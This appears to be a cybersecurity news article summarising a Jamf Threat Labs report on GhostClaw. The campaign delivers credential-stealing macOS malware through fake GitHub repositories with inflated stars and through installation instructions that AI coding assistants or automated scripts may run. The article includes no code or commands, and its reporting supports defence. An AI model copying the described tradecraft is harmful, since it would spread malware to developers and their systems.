GhostClaw Rising: AI-Assisted Malware Campaign Targets macOS via Malicious GitHub Repos
Ddos 
A malicious GitHub repository | Image: Jamf Threat Labs
Jamf Threat Labs has released a new report detailing the evolution of GhostClaw, a sophisticated malware campaign that has pivoted its tactics to exploit the very heart of the modern developer ecosystem. By leveraging GitHub repositories and AI-assisted development workflows, the threat actors behind GhostClaw are successfully delivering credential-stealing payloads to macOS users under the guise of legitimate software.
The primary vector for this new wave of attacks involves a “parallel distribution method leveraging GitHub repositories”. These repositories are meticulously crafted to appear credible, often impersonating popular developer utilities, SDKs, or high-interest tools like trading bots.
To further deceive victims, the attackers have successfully manipulated social proof metrics. As Jamf Threat Labs notes:
“Several of the identified repositories have accumulated significant engagement, in some cases exceeding hundreds of stars, further reinforcing their perceived legitimacy”.
This shift is particularly dangerous because it expands the potential victim pool to “any user or automated workflow willing to execute commands sourced from online instructions”.
A standout feature of the GhostClaw campaign is its alignment with emerging technology trends. The researchers found that the threat actors are actively exploiting the rise of AI in coding.
“This campaign highlights a continued shift in attacker tradecraft, where distribution methods extend beyond traditional package registries into platforms such as GitHub and emerging AI-assisted development workflows”.
By embedding malicious code into instructions that developers might feed into AI coding assistants or execute as part of automated setup scripts, the attackers can introduce malware into sensitive environments with “minimal friction”.
The technical backbone of GhostClaw is designed for persistence and stealth. The campaign utilizes a single domain combined with unique identifiers to track different infection vectors. This allows the threat actor to “segment activity across different repositories or lures,” essentially running multiple specialized sub-campaigns simultaneously.
While earlier iterations of the malware used specific identifiers like complexarchaeologist1, Jamf found that newer versions use different values, suggesting a constantly evolving infrastructure.
GhostClaw is part of a growing trend of software supply chain-style attacks, similar to recent campaigns like Glassworm and PolinRider. Rather than targeting a single high-value individual, these methods allow attackers to “impact a larger number of systems through a single delivery mechanism”.
The reliance on familiar installation workflows and trusted ecosystems like GitHub significantly reduces the suspicion typically associated with downloading unknown software.
Jamf Threat Labs warns that as delivery methods move closer to the developer’s everyday tools, the responsibility for safety shifts to the user.
“Users and developers should remain cautious when executing installation commands sourced from online content, including repositories and automated tooling”. The report concludes that validating the origin and behavior of any code prior to execution is now a “critical step in reducing exposure”.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
